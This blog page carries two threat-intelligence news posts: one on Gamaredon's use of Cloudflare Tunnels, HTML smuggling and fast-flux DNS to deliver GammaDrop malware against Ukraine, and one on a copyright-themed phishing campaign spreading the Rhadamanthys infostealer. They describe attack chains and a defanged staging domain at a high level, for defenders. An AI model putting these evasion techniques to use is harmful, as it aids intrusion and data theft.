Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label spear-phishing. Show all posts

Hackers Exploit Cloudflare Tunnels and DNS Fast-Flux to Conceal GammaDrop Malware

 A notorious threat actor known as Gamaredon has been observed employing Cloudflare Tunnels to hide its malware staging infrastructure, facilitating the deployment of GammaDrop malware. This technique is part of a spear-phishing campaign actively targeting Ukrainian organizations since early 2024. 

Campaign Details and Tactics 

According to Recorded Future's Insikt Group, the primary goal of this campaign is to deliver Visual Basic Script malware. The group, monitored under the alias BlueAlpha, has also been identified by several other names, including:

  • Aqua Blizzard
  • Armageddon
  • Hive0051
  • Iron Tilden
  • Primitive Bear
  • Shuckworm
  • Trident Ursa
  • UAC-0010
  • UNC530
  • Winterflounder
Active since 2014, BlueAlpha is linked to Russia's Federal Security Service (FSB). "BlueAlpha has recently started using Cloudflare Tunnels to obscure staging infrastructure for GammaDrop, a tactic gaining traction among cybercriminal groups," noted Insikt Group. Additionally, the group continues to use DNS fast-fluxing to complicate the tracking and disruption of command-and-control (C2) communications. 
 
Recent Observations 

The use of Cloudflare Tunnels by Gamaredon was first reported in September 2024 by ESET, a Slovak cybersecurity firm, during attacks targeting Ukraine and NATO countries, including Bulgaria, Latvia, Lithuania, and Poland. ESET described BlueAlpha's methods as "reckless and not particularly stealth-focused," although the group employs measures to evade detection and maintain access to compromised systems. These include deploying multiple simple downloaders or backdoors and frequently updating their malware tools with regularly changing obfuscation techniques. 
 
Malware Deployment Process 

The phishing campaign uses HTML attachments to initiate infections via HTML smuggling. This technique embeds JavaScript code to deliver malicious payloads. Key steps include:
  • Phishing emails with HTML attachments drop a 7-Zip archive ("56-27-11875.rar") containing a malicious LNK file.
  • The LNK file exploits mshta.exe to deliver GammaDrop malware.
  • GammaDrop deploys a custom loader, GammaLoad, which connects to a C2 server to retrieve additional malware.
The GammaDrop malware is staged on a server behind a Cloudflare Tunnel, with the domain amsterdam-sheet-veteran-aka.trycloudflare[.]com serving as a staging point. GammaLoad uses DNS-over-HTTPS (DoH) services like Google and Cloudflare to resolve C2 infrastructure, employing fast-flux DNS methods as a fallback. 
 
Implications and Future Threats 

Recorded Future warns that BlueAlpha is likely to continue refining its evasion techniques by exploiting legitimate services like Cloudflare. This approach complicates detection for traditional security systems. The group's enhancements to HTML smuggling and DNS-based persistence highlight evolving challenges for organizations with limited threat detection capabilities. "Organizations must strengthen their defenses against phishing campaigns and adopt advanced threat detection strategies to mitigate risks posed by actors like BlueAlpha," the report concluded.

Global Companies Targeted by "CopyR(ight)hadamantys" Phishing Scam Using Advanced Infostealer Malware

 

Hundreds of organizations worldwide have recently fallen victim to a sophisticated spear-phishing campaign, where emails falsely claiming copyright infringement are used to deliver an advanced infostealer malware.

Since July, Check Point Research has tracked the distribution of these emails across regions like the Americas, Europe, and Southeast Asia. Each email originates from a unique domain, and hundreds of Check Point’s clients have been targeted, suggesting the campaign's scope may be even broader.

The emails are designed to provoke recipients into downloading Rhadamanthys, a powerful infostealer capable of extracting sensitive data, such as cryptocurrency wallet information. Check Point researchers refer to the campaign as "CopyR(ight)hadamantys" and note the use of automated tools to send emails from different addresses. This automation can lead to awkward results, such as emails written in incorrect languages, limiting the emails’ ability to impersonate recognizable brands effectively. Roughly 70% of impersonated companies belong to the tech or media and entertainment sectors, including Check Point itself.

The phishing emails claim that the recipient has violated copyright laws by posting unauthorized content online. According to Sergey Shykevich, threat intelligence manager at Check Point, these accusations often cause recipients to question if they mistakenly used copyrighted material, increasing the chance they'll download the malware.

Recipients are directed to download a password-protected file, which contains a link leading to Dropbox or Discord. This file holds a decoy document, a legitimate program, and a malicious DLL (dynamic link library) that installs Rhadamanthys. Rhadamanthys stands out as one of the most sophisticated information-stealing tools sold on the dark web, priced around $1,000—significantly higher than other infostealers, which typically range from $100 to $200. Rhadamanthys is known for its modularity, obfuscation, and stealth, making detection much more challenging.

One notable feature of Rhadamanthys is its machine-learning-based OCR (optical character recognition) component. While limited in capability—it struggles with complex fonts and handwriting—this feature allows it to extract information from images and PDF files. The OCR module in the current campaign contains a dictionary of words tied to Bitcoin wallet security, suggesting a focus on cryptocurrency theft.

The CopyR(ight)hadamantys campaign aligns with financially motivated tactics, but Rhadamanthys has also been linked to state-sponsored actors, including Iran’s Void Manticore and the pro-Palestinian Handala group. Organizations are advised to enhance phishing defenses, though this campaign has an additional, unusual feature.

Once deployed, the malicious DLL creates a much larger file in the user’s Documents folder, disguised as a Firefox component. This larger version, though identical in function, uses an "overlay" of excess data, which serves two purposes: altering the file’s hash value, and potentially avoiding antivirus detection by exploiting a tendency of some programs to skip scanning large files.

According to Shykevich, organizations should monitor unusually large files downloaded via email, though legitimate files may also be large. He believes implementing effective download rules could help combat this tactic.